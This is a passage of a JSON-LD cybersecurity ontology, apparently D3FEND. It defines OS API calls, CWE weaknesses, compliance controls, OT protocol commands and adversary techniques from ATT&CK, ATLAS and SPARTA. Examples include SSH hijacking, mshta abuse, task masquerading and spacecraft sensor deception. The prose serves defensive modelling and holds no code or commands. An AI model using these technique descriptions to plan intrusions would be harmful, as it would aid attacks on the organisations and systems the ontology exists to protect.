        "@id": "https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-resumethread"
      },
      "rdfs:label": "Windows ResumeThread",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPIResumeThread"
        },
        {
          "@id": "_:Nd99aa46a7528407b94e9e1b960d1bfab"
        }
      ]
    },
    {
      "@id": "_:Nd99aa46a7528407b94e9e1b960d1bfab",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtResumeThread"
      }
    },
    {
      "@id": "d3f:OTDebugCommand",
      "@type": "owl:Class",
      "d3f:definition": "Investigate or analyze the current state of the system.",
      "rdfs:comment": [
        "BACnet: getEnrollmentSummary\nBACnet: confirmed-audit-notification\nBACnet: audit-log-query\nBACnet: unconfirmed-audit-notification ",
        "Modbus: Get Comm. Event Log\nModbus: Return Query Data\nModbus: Clear Counters\nModbus: Get Comm. Event Counters"
      ],
      "rdfs:label": "OT Debug Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTDiagnosticsMessage"
      }
    },
    {
      "@id": "d3f:T1563.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:SSHSession"
      },
      "d3f:attack-id": "T1563.001",
      "d3f:definition": "Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.",
      "rdfs:label": "SSH Hijacking",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1563"
        },
        {
          "@id": "_:N51f8aa1e146d4ea3919da3fa7293ed41"
        }
      ]
    },
    {
      "@id": "_:N51f8aa1e146d4ea3919da3fa7293ed41",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SSHSession"
      }
    },
    {
      "@id": "d3f:RestoreConfiguration",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:RestoreConfiguration"
      ],
      "d3f:d3fend-id": "D3-RC",
      "d3f:definition": "Restoring an software configuration.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-CybersecurityIncidentandVulnerabilityResponsePlaybooks"
      },
      "d3f:restores": {
        "@id": "d3f:ConfigurationResource"
      },
      "rdfs:label": "Restore Configuration",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:RestoreObject"
        },
        {
          "@id": "_:N3b4ee1a484594c6aa1dd241d0758e6e9"
        }
      ]
    },
    {
      "@id": "_:N3b4ee1a484594c6aa1dd241d0758e6e9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:restores"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ConfigurationResource"
      }
    },
    {
      "@id": "d3f:Semi-supervisedWrapperMethod",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SSWM",
      "d3f:definition": "The principle behind wrapper methods is that we train a model with labeled data and then generate pseudo-labels for the unlabeled data using the trained model iteratively.",
      "d3f:kb-article": "## References\nJashish, M. (n.d.). Beginner's Guide to Semi-Supervised Learning. Jashish Blog.  [Link](http://jashish.com.np/blog/posts/beginners-guide-to-semi-supervised-learning/).",
      "rdfs:label": "Semi-supervised Wrapper Method",
      "rdfs:subClassOf": {
        "@id": "d3f:Semi-SupervisedLearning"
      }
    },
    {
      "@id": "d3f:DomainRegistration",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A domain registration, or domain name registration data, is the relevant registration data from Internet resources such as domain names, IP addresses, and autonomous system numbers. Registration data is typically retrieved by means of either the Registration Data Access Protocol (RDAP) or its predecessor, the WHOIS protocol.",
      "d3f:may-contain": {
        "@id": "d3f:DomainName"
      },
      "rdfs:label": "Domain Registration",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Domain_registration"
        },
        {
          "@id": "dbr:WHOIS"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformation"
        },
        {
          "@id": "_:Na8a036da4c5d47ff9ca98fbf789428c7"
        }
      ],
      "skos:altLabel": "Domain Name Registration Data"
    },
    {
      "@id": "_:Na8a036da4c5d47ff9ca98fbf789428c7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DomainName"
      }
    },
    {
      "@id": "d3f:M1028",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": {
        "@id": "d3f:PlatformHardening"
      },
      "rdfs:label": "Operating System Configuration"
    },
    {
      "@id": "d3f:T1036.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1036.004",
      "d3f:definition": "Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or description.(Citation: TechNet Schtasks)(Citation: Systemd Service Units) Windows services will have a service name as well as a display name. Many benign tasks and services exist that have commonly associated names. Adversaries may give tasks or services names that are similar or identical to those of legitimate ones.",
      "d3f:modifies": {
        "@id": "d3f:JobSchedule"
      },
      "rdfs:label": "Masquerade Task or Service",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1036"
        },
        {
          "@id": "_:N41b12baae24d4559a854006d8d80f5bc"
        }
      ]
    },
    {
      "@id": "_:N41b12baae24d4559a854006d8d80f5bc",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:JobSchedule"
      }
    },
    {
      "@id": "d3f:T1586",
      "@type": "owl:Class",
      "d3f:attack-id": "T1586",
      "d3f:definition": "Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. [Establish Accounts](https://attack.mitre.org/techniques/T1585)), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona.",
      "rdfs:label": "Compromise Accounts",
      "rdfs:subClassOf": {
        "@id": "d3f:ResourceDevelopmentTechnique"
      }
    },
    {
      "@id": "d3f:CWE-1073",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1073",
      "d3f:definition": "The product contains a client with a function or method that contains a large number of data accesses/queries that are sent through a data manager, i.e., does not use efficient database capabilities.",
      "rdfs:label": "Non-SQL Invokable Control Element with Excessive Number of Data Resource Accesses",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-405"
      }
    },
    {
      "@id": "d3f:CCI-000020_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system dynamically manages user privileges and associated access authorizations.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-14T00:00:00"
      },
      "rdfs:label": "CCI-000020"
    },
    {
      "@id": "d3f:OSAPIMoveFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that moves or renames a file or directory from one location to another within the file system.",
      "d3f:invokes": {
        "@id": "d3f:MoveFile"
      },
      "rdfs:label": "OS API Move File",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:N5efcf52b9b2d439ebdaad3cddd616640"
        }
      ]
    },
    {
      "@id": "_:N5efcf52b9b2d439ebdaad3cddd616640",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MoveFile"
      }
    },
    {
      "@id": "d3f:OTDeleteControlProgramCommand",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Commands a remote device to remove an existing control program.",
      "d3f:modifies": {
        "@id": "d3f:OTControlProgram"
      },
      "rdfs:label": "OT Delete Control Program Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTModifyControlProgramCommand"
        },
        {
          "@id": "_:N8780594b6de149f9b20b6aedb0ddc407"
        }
      ]
    },
    {
      "@id": "_:N8780594b6de149f9b20b6aedb0ddc407",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControlProgram"
      }
    },
    {
      "@id": "d3f:CCI-001937_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The device used in the information system implementation of multifactor authentication for network access to privileged accounts meets organization-defined strength of mechanism requirements.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:Multi-factorAuthentication"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-05-03T00:00:00"
      },
      "rdfs:label": "CCI-001937"
    },
    {
      "@id": "d3f:Semi-supervisedGenerativeModelLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SSGML",
      "d3f:definition": "A Semi Supervised Machine Learning model which assume that the distributions take some particular form p(x|y,theta) parameterized by the vector. If these assumptions are incorrect, the unlabeled data may actually decrease the accuracy of the solution relative to what would have been obtained from labeled data alone. However, if the assumptions are correct, then the unlabeled data necessarily improves performance.",
      "d3f:kb-article": "## References\nWeak supervision. Wikipedia.  [Link](https://en.wikipedia.org/wiki/Weak_supervision#Generative_models).",
      "rdfs:label": "Semi-supervised Generative Model Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:IntrinsicallySemi-supervisedLearning"
      }
    },
    {
      "@id": "d3f:AML.TA0009",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:attack-id": "AML.TA0009",
      "d3f:definition": "The adversary is trying to gather AI artifacts and other related information relevant to their goal.\n\nCollection consists of techniques adversaries may use to gather information and the sources information is collected from that are relevant to following through on the adversary's objectives.\nFrequently, the next goal after collecting data is to steal (exfiltrate) the AI artifacts, or use the collected information to stage future operations.\nCommon target sources include software repositories, container registries, model repositories, and object stores.",
      "rdfs:label": "Collection - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/tactics/AML.TA0009"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Collection"
    },
    {
      "@id": "d3f:CWE-674",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-674",
      "d3f:definition": "The product does not properly control the amount of recursion that takes place, consuming excessive resources, such as allocated memory or the program stack.",
      "d3f:synonym": "Stack Exhaustion",
      "rdfs:label": "Uncontrolled Recursion",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-834"
      }
    },
    {
      "@id": "d3f:CWE-37",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-37",
      "d3f:definition": "The product accepts input in the form of a slash absolute path ('/absolute/pathname/here') without appropriate validation, which can allow an attacker to traverse the file system to unintended locations or access arbitrary files.",
      "rdfs:label": "Path Traversal: '/absolute/pathname/here'",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-160"
        },
        {
          "@id": "d3f:CWE-36"
        }
      ]
    },
    {
      "@id": "d3f:CWE-1429",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1429",
      "d3f:definition": "The product has a hardware interface that silently discards operations in situations for which feedback would be security-relevant, such as the timely detection of failures or attacks.",
      "rdfs:label": "Missing Security-Relevant Feedback for Unexecuted Operations in Hardware Interface",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-223"
      }
    },
    {
      "@id": "d3f:d3fend-comment",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "x d3fend-comment y: The entity x has an D3FEND team written a public note about entity y.",
      "rdfs:label": "d3fend-comment",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-kb-data-property"
      }
    },
    {
      "@id": "d3f:WindowsGetThreadContext",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Retrieves the context of the specified thread.",
      "d3f:invokes": {
        "@id": "d3f:WindowsNTGetThreadContext"
      },
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-getthreadcontext"
      },
      "rdfs:label": "Windows GetThreadContext",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPIGetThreadContext"
        },
        {
          "@id": "_:N491ab029c1874d9d8f252bf4bb3d9928"
        }
      ]
    },
    {
      "@id": "_:N491ab029c1874d9d8f252bf4bb3d9928",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNTGetThreadContext"
      }
    },
    {
      "@id": "d3f:AML.T0067.000",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0067.000",
      "d3f:definition": "Adversaries may manipulate the citations provided in an AI system's response, in order to make it appear trustworthy. Variants include citing a providing the wrong citation, making up a new citation, or providing the right citation but for adversary-provided data.",
      "rdfs:label": "Citations - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0067.000"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0067"
      },
      "skos:prefLabel": "Citations"
    },
    {
      "@id": "d3f:T1585.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1585.002",
      "d3f:definition": "Adversaries may create email accounts that can be used during targeting. Adversaries can use accounts created with email providers to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1) Establishing email accounts may also allow adversaries to abuse free services – such as trial periods – to [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) for follow-on purposes.(Citation: Free Trial PurpleUrchin)",
      "rdfs:label": "Email Accounts",
      "rdfs:subClassOf": {
        "@id": "d3f:T1585"
      }
    },
    {
      "@id": "d3f:CWE-25",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-25",
      "d3f:definition": "The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize \"/../\" sequences that can resolve to a location that is outside of that directory.",
      "rdfs:label": "Path Traversal: '/../filedir'",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-23"
      }
    },
    {
      "@id": "d3f:CWE-482",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-482",
      "d3f:definition": "The code uses an operator for comparison when the intention was to perform an assignment.",
      "rdfs:label": "Comparing instead of Assigning",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-480"
      }
    },
    {
      "@id": "d3f:M1024",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": {
        "@id": "d3f:SystemConfigurationPermissions"
      },
      "rdfs:label": "Restrict Registry Permission"
    },
    {
      "@id": "d3f:CWE-308",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-308",
      "d3f:definition": "The use of single-factor authentication can lead to unnecessary risk of compromise when compared with the benefits of a dual-factor authentication scheme.",
      "rdfs:label": "Use of Single-factor Authentication",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1390"
        },
        {
          "@id": "d3f:CWE-654"
        }
      ]
    },
    {
      "@id": "d3f:T1218.005",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1218.005",
      "d3f:definition": "Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017)",
      "d3f:interprets": {
        "@id": "d3f:MicrosoftHTMLApplication"
      },
      "d3f:invokes": {
        "@id": "d3f:CreateProcess"
      },
      "rdfs:label": "Mshta",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1218"
        },
        {
          "@id": "_:N927b47fce22e43feb13b57d5dae0af8f"
        },
        {
          "@id": "_:N3d71e0d689cc4e6d9a5f43e2736a6902"
        }
      ]
    },
    {
      "@id": "_:N927b47fce22e43feb13b57d5dae0af8f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:interprets"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MicrosoftHTMLApplication"
      }
    },
    {
      "@id": "_:N3d71e0d689cc4e6d9a5f43e2736a6902",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "d3f:DE-0009.04",
      "@type": "owl:Class",
      "d3f:attack-id": "DE-0009.04",
      "d3f:definition": "The attacker aims at the spacecraft’s own proximity-awareness stack, cameras, star-tracker side products, lidar/radar, RF transponders, and the onboard fusion that estimates nearby objects. Methods include optical dazzling or reflective camouflage that confuses centroiding and detection, RCS management to fall below radar gate thresholds, intermittent or misleading transponder replies, and presentation of spoofed fiducials or optical patterns tuned to the vehicle’s detection algorithms. By biasing these local sensors and their fusion logic, the adversary hides approach, distorts relative-state estimates, or induces the target to classify a nearby object as benign clutter, masking proximity operations without relying on external catalog errors.",
      "rdfs:label": "Targeted Deception of Onboard SSA/SDA Sensors - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0009/04/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DE-0009"
      },
      "skos:prefLabel": "Targeted Deception of Onboard SSA/SDA Sensors"
    },
    {
      "@id": "d3f:T1059.008",
      "@type": "owl:Class",
      "d3f:attack-id": "T1059.008",
      "d3f:definition": "Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious command and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands.",
      "rdfs:label": "Network Device CLI",
      "rdfs:subClassOf": {
        "@id": "d3f:T1059"
      }
    },
    {
      "@id": "d3f:CCI-002717_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:FileHashing"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements cryptographic mechanisms to detect unauthorized changes to firmware.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-11T00:00:00"
      },
      "rdfs:label": "CCI-002717"
    },
    {
      "@id": "d3f:RD-0001.01",
      "@type": "owl:Class",
      "d3f:attack-id": "RD-0001.01",
      "d3f:definition": "Rather than compromising existing stations, adversaries may acquire or assemble their own RF ground stack. Typical building blocks include: steerable mounts with auto-track, time/frequency standards, band-appropriate antennas and feeds, LNAs and filters at the feed, low-loss IF chains, T/R switching, medium/high-power amplifiers with protection and telemetry, and weather protection. Baseband equipment often mixes SDRs with commercial modems to generate/capture mission waveforms and framing; signal generators and spectrum analyzers support calibration and banner-grabbing. On the digital side, ground data processors translate captured frames to packetized formats for analysis and rehearsal. With this kit, an actor can passively collect, actively probe, or attempt spoofing if link-layer authentication is weak.",
      "rdfs:label": "Ground Station Equipment - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/RD-0001/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:RD-0001"
      },
      "skos:prefLabel": "Ground Station Equipment"
    },
    {
      "@id": "d3f:CWE-464",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-464",
      "d3f:definition": "The accidental addition of a data-structure sentinel can cause serious programming logic problems.",
      "rdfs:label": "Addition of Data Structure Sentinel",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-138"
      }
    },
    {
      "@id": "d3f:T0847",
      "@type": "owl:Class",
      "d3f:attack-id": "T0847",
      "d3f:definition": "Adversaries may move onto systems, such as those separated from the enterprise network, by copying malware to removable media which is inserted into the control systems environment. The adversary may rely on unknowing trusted third parties, such as suppliers or contractors with access privileges, to introduce the removable media. This technique enables initial access to target devices that never connect to untrusted networks, but are physically accessible.",
      "rdfs:label": "Replication Through Removable Media - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSInitialAccessTechnique"
      },
      "skos:prefLabel": "Replication Through Removable Media"
    },
    {
      "@id": "d3f:T1491.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1491.001",
      "d3f:definition": "An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users, thus discrediting the integrity of the systems. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper.(Citation: Novetta Blockbuster) Disturbing or offensive images may be used as a part of [Internal Defacement](https://attack.mitre.org/techniques/T1491/001) in order to cause user discomfort, or to pressure compliance with accompanying messages. Since internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.(Citation: Novetta Blockbuster Destructive Malware)",
      "d3f:modifies": {
        "@id": "d3f:Resource"
      },
      "rdfs:label": "Internal Defacement",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1491"
        },
        {
          "@id": "_:Nfee1b7e611294d90bbe646abb71d9b5b"
        }
      ]
    },
    {
      "@id": "_:Nfee1b7e611294d90bbe646abb71d9b5b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Resource"
      }
    },
    {
      "@id": "d3f:T1124",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1124",
      "d3f:definition": "An adversary may gather the system time and/or time zone settings from a local or remote system. The system time is set and stored by services, such as the Windows Time Service on Windows or <code>systemsetup</code> on macOS.(Citation: MSDN System Time)(Citation: Technet Windows Time Service)(Citation: systemsetup mac time) These time settings may also be synchronized between systems and services in an enterprise network, typically accomplished with a network time server within a domain.(Citation: Mac Time Sync)(Citation: linux system time)",
      "d3f:may-invoke": [
        {
          "@id": "d3f:CreateProcess"
        },
        {
          "@id": "d3f:GetSystemTime"
        }
      ],
      "rdfs:label": "System Time Discovery",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DiscoveryTechnique"
        },
        {
          "@id": "_:Nfc1b7fa59e994508b2a663a02497fcc0"
        },
        {
          "@id": "_:Neac00d1800644d61badf00ded0a2b2b4"
        }
      ]
    },
    {
      "@id": "_:Nfc1b7fa59e994508b2a663a02497fcc0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-invoke"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "_:Neac00d1800644d61badf00ded0a2b2b4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-invoke"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:GetSystemTime"
      }
    },
    {
      "@id": "d3f:CCI-001170_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system prevents the automatic execution of mobile code in organization-defined software applications.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:ExecutableDenylisting"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001170"
    },
    {
      "@id": "d3f:CWE-686",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-686",
      "d3f:definition": "The product calls a function, procedure, or routine, but the caller specifies an argument that is the wrong data type, which may lead to resultant weaknesses.",
      "rdfs:label": "Function Call With Incorrect Argument Type",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-628"
      }
    },
    {
      "@id": "d3f:T1398",
      "@type": "owl:Class",
      "d3f:attack-id": "T1398",
      "d3f:definition": "Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence. Initialization scripts are part of the underlying operating system and are not accessible to the user unless the device has been rooted or jailbroken.",
      "rdfs:label": "Boot or Logon Initialization Scripts - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobilePersistenceTechnique"
      },
      "skos:prefLabel": "Boot or Logon Initialization Scripts"
    },
    {
      "@id": "d3f:WindowsRegistryValueDeletionEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a registry value is deleted from the Windows Registry, permanently removing its associated data.",
      "rdfs:label": "Windows Registry Value Deletion Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:WindowsRegistryValueEvent"
        },
        {
          "@id": "_:Nf04d8b2e17e64effbe89b06eafdcf1a1"
        }
      ]
    },
    {
      "@id": "_:Nf04d8b2e17e64effbe89b06eafdcf1a1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsRegistryValueSetEvent"
      }
    },
    {
      "@id": "d3f:T1588.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1588.001",
      "d3f:definition": "Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.",
      "rdfs:label": "Malware",
      "rdfs:subClassOf": {
        "@id": "d3f:T1588"
      }
    },
    {
      "@id": "d3f:CWE-673",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-673",
      "d3f:definition": "The product does not prevent the definition of control spheres from external actors.",
      "rdfs:label": "External Influence of Sphere Definition",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-664"
      }
    },
    {
      "@id": "d3f:CWE-143",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-143",
      "d3f:definition": "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as record delimiters when they are sent to a downstream component.",
      "rdfs:label": "Improper Neutralization of Record Delimiters",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-140"
      }
    },
    {
      "@id": "d3f:T1509",
      "@type": "owl:Class",
      "d3f:attack-id": "T1509",
      "d3f:definition": "Adversaries may generate network traffic using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088 or port 587 as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.",
      "rdfs:label": "Non-Standard Port - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCommandAndControlTechnique"
      },
      "skos:prefLabel": "Non-Standard Port"
    },
    {
      "@id": "d3f:SpecificationReference",
      "@type": "owl:Class",
      "d3f:pref-label": "Specification",
      "rdfs:label": "Specification Reference",
      "rdfs:subClassOf": {
        "@id": "d3f:TechniqueReference"
      }
    },
    {
      "@id": "d3f:Firmware",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In electronic systems and computing, firmware is a type of software that provides control, monitoring and data manipulation of engineered products and systems. Typical examples of devices containing firmware are embedded systems (such as traffic lights, consumer appliances, remote controls and digital watches), computers, computer peripherals, mobile phones, and digital cameras. The firmware contained in these devices provides the low-level control program for the device.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Firmware"
      },
      "rdfs:label": "Firmware",
      "rdfs:subClassOf": {
        "@id": "d3f:Software"
      }
    },
    {
      "@id": "d3f:TrustedAdministratorAttacker",
      "@type": "owl:Class",
      "d3f:definition": "A trusted attacker who misuses administrative access to execute attacks, often with elevated privileges.",
      "rdfs:label": "Trusted Administrator Attacker",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:TrustedAttacker"
        },
        {
          "@id": "_:N2f928de2383f477888409174dfde67e4"
        }
      ]
    },
    {
      "@id": "_:N2f928de2383f477888409174dfde67e4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PrivilegedUserAccount"
      }
    },
    {
      "@id": "d3f:may-harden",
      "@type": "owl:ObjectProperty",
      "d3f:pref-label": "may harden",
      "rdfs:label": "may-harden",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-counter-attack"
      }
    },
    {
